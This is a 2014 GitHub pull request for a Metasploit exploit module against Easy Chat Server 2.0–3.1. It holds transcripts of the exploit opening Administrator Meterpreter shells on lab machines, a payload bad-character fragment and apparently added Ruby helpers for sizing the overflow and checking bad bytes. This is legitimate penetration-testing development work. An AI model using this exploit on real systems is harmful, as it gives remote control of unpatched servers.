
Update efs_easychatserver_username.rb #3431

Merged: 1 commit merged into rapid7:master on Jun 10, 2014

Conversation

@bcoles (Contributor) commented Jun 7, 2014

Add targets for versions 2.0 to 3.1.
Add install path detection for junk size calculation.
Add version detection for auto targeting.

msf exploit(efs_easychatserver_username) > set VERBOSE true
VERBOSE => true
msf exploit(efs_easychatserver_username) > check

[*] 172.1.1.112:80 - Found version: 2.1
[*] 172.1.1.112:80 - Found path: C:\EFS Software\Easy Chat Server2.1
[*] 172.1.1.112:80 - The target appears to be vulnerable.
msf exploit(efs_easychatserver_username) > run

[*] Started reverse handler on 172.1.1.104:4444 
[*] 172.1.1.112:80 - Found version: 2.1
[*] 172.1.1.112:80 - Using path: C:\EFS Software\Easy Chat Server2.1\users\
[*] 172.1.1.112:80 - Sending request (542 bytes) to target (Easy Chat Server 2.1 - 3.1)
[*] Sending stage (770048 bytes) to 172.1.1.112
[*] Meterpreter session 1 opened (172.1.1.104:4444 -> 172.1.1.112:49242) at 2014-06-07 15:45:35 -0400

meterpreter > 

@jvazquez-r7 (Contributor)

Thanks @bcoles , processing!

@jvazquez-r7 (Contributor)

Works on 3.0 and 2.2. But I cannot find a 2.0 version.

  • 3.0
msf exploit(efs_easychatserver_username) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.174:80 - Found version: 3.0
[*] 172.16.158.174:80 - Using path: C:\EFS Software\Easy Chat Server\users\
[*] 172.16.158.174:80 - Sending request (545 bytes) to target (Easy Chat Server 2.1 - 3.1)
[*] Sending stage (770048 bytes) to 172.16.158.174
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.174:1073) at 2014-06-09 12:06:29 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.174 - Meterpreter session 4 closed.  Reason: User exit
  • 2.2
msf exploit(efs_easychatserver_username) > check

[*] 172.16.158.174:80 - Found version: 2.2
[*] 172.16.158.174:80 - Found path: C:\Program Files\Easy Chat Server
[*] 172.16.158.174:80 - The target appears to be vulnerable.
msf exploit(efs_easychatserver_username) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.174:80 - Found version: 2.2
[*] 172.16.158.174:80 - Using path: C:\Program Files\Easy Chat Server\users\
[*] 172.16.158.174:80 - Sending request (544 bytes) to target (Easy Chat Server 2.1 - 3.1)
[*] Sending stage (770048 bytes) to 172.16.158.174
[*] Meterpreter session 5 opened (172.16.158.1:4444 -> 172.16.158.174:1074) at 2014-06-09 12:07:48 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.174 - Meterpreter session 5 closed.  Reason: User exit
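The transcripts above log the detected install path next to the size of the request the module sends, and the commit message says the path is used for the junk size calculation. The following Ruby is an added example, not code from the module or from either participant: it parses those "Using path" / "Sending request" lines and checks that path length plus request size is one fixed total, which is what a path-dependent junk filler produces. The sample log is constructed from the lines on this page; the total the code derives is inferred from those three pairs and is an assumption about the module, not a value taken from it.

```ruby
# Constructed sample: the "Using path" / "Sending request" lines copied from
# the transcripts in this PR (2.1, 3.0 and 2.2 runs), plus the 2.0 run, which
# logs no path and is therefore skipped by the parser.
TRANSCRIPT = <<~LOG
  [*] 172.1.1.112:80 - Using path: C:\\EFS Software\\Easy Chat Server2.1\\users\\
  [*] 172.1.1.112:80 - Sending request (542 bytes) to target (Easy Chat Server 2.1 - 3.1)
  [*] 172.16.158.174:80 - Using path: C:\\EFS Software\\Easy Chat Server\\users\\
  [*] 172.16.158.174:80 - Sending request (545 bytes) to target (Easy Chat Server 2.1 - 3.1)
  [*] 172.16.158.174:80 - Using path: C:\\Program Files\\Easy Chat Server\\users\\
  [*] 172.16.158.174:80 - Sending request (544 bytes) to target (Easy Chat Server 2.1 - 3.1)
  [*] 172.16.158.174:80 - Sending request (544 bytes) to target (Easy Chat Server 2.0)
LOG

# Pair each logged install path with the request size that follows it.
# A "Sending request" line with no preceding path (the 2.0 target) is ignored.
def path_size_pairs(log)
  pairs = []
  current_path = nil
  log.each_line do |line|
    if (m = line.match(/Using path: (.+?)\s*$/))
      current_path = m[1]
    elsif (m = line.match(/Sending request \((\d+) bytes\)/)) && current_path
      pairs << [current_path, m[1].to_i]
      current_path = nil
    end
  end
  pairs
end

# If the junk is sized from the path, size + path.length is constant across
# runs. Raises when the observations disagree, so a bad parse is not silent.
def fixed_total(pairs)
  totals = pairs.map { |path, size| size + path.length }.uniq
  unless totals.size == 1
    raise "request sizes do not fit a single fixed total: #{totals.inspect}"
  end
  totals.first
end

# Request size the model predicts for a given install path (assumption:
# the same fixed total applies to every 2.1 - 3.1 target).
def expected_request_size(path, total)
  total - path.length
end

if __FILE__ == $PROGRAM_NAME
  pairs = path_size_pairs(TRANSCRIPT)
  total = fixed_total(pairs)
  pairs.each do |path, size|
    puts format("%-45s %3d bytes (fits total %d)", path, size, total)
  end
end
```

The check is useful when reviewing a run on a new install path: if the logged size does not match `expected_request_size`, either the path detection returned something other than the real directory or the fixed part of the request changed.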

'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x0b\x0d\x20\x23\x25\x26\x2b\x2f\x3a\x3f\x5c",
Contributor (inline review comment on the diff)

I'm worried about the Space and BadChars changes. Are they compatible with the 2.0 target? I couldn't download a 2.0 version. Were you able to test?
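The reviewer's question is whether one 'Space' / 'BadChars' declaration holds for every target, since the module encodes the payload once against those constraints. The Ruby below is an added example, not code from the module or from Metasploit: it checks a byte blob against the exact values in the fragment above and reports every offending byte with its offset, so the question can be answered per target by running the encoded blob for that target through it instead of reading the list by eye. The sample blobs are constructed here and are arbitrary bytes, not a real payload.

```ruby
# Values taken from the review fragment above.
SPACE     = 500
BAD_CHARS = "\x00\x0a\x0b\x0d\x20\x23\x25\x26\x2b\x2f\x3a\x3f\x5c".b.freeze

# Returns a list of human-readable violations; an empty list means the blob
# satisfies both constraints. Every bad byte is reported, not just the first,
# so a reviewer sees the whole picture in one run.
def payload_violations(blob, space: SPACE, bad_chars: BAD_CHARS)
  bytes = blob.b
  bad   = bad_chars.bytes
  violations = []
  if bytes.bytesize > space
    violations << format("size %d exceeds Space %d", bytes.bytesize, space)
  end
  bytes.each_byte.with_index do |b, i|
    violations << format("bad char 0x%02x at offset %d", b, i) if bad.include?(b)
  end
  violations
end

def payload_ok?(blob, **opts)
  payload_violations(blob, **opts).empty?
end

# Constructed sample blobs (arbitrary bytes, not a real payload):
CLEAN = (0x41..0x5a).to_a.pack("C*")   # "ABC...Z": no bad chars, well under Space
DIRTY = "AB\x20CD\x00EF".b              # contains a space (0x20) and a NUL (0x00)

if __FILE__ == $PROGRAM_NAME
  { "clean" => CLEAN, "dirty" => DIRTY, "oversized" => "A" * 501 }.each do |name, blob|
    problems = payload_violations(blob)
    puts "#{name}: #{problems.empty? ? 'ok' : problems.join(', ')}"
  end
end
```

The list in the fragment is the usual set of bytes that a URL-encoded form field cannot carry literally (NUL, line terminators, space, and the URL delimiters), which is why the same constraints apply regardless of which target version receives the request.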

@bcoles (Contributor, Author) commented Jun 10, 2014

Thanks @jvazquez-r7

The space and bad characters are valid for 3.1, but I'll have to check 2.0.

The exploit works for me reliably on 2.0 to 3.1 with meterpreter bind and reverse.

Here are the links:

@jvazquez-r7 (Contributor)

Thanks @bcoles! Giving 2.0 a chance, then!

@todb-r7 added the module label on Jun 10, 2014
@jvazquez-r7 (Contributor)

Works also on 2.0:

msf exploit(efs_easychatserver_username) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.174:80 - Sending request (544 bytes) to target (Easy Chat Server 2.0)
[*] Sending stage (770048 bytes) to 172.16.158.174
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.174:1122) at 2014-06-10 09:42:54 -0500
meterpreter > id
[-] Unknown command: id.
meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter >

Checking the badchars and space params on 2.0!

@jvazquez-r7 (Contributor)

Yeah, the modified badchars list by @bcoles is also accurate on 2.0. Landing!

@jvazquez-r7 jvazquez-r7 merged commit 6bef6ed into rapid7:master Jun 10, 2014
@jvazquez-r7 jvazquez-r7 self-assigned this Jun 10, 2014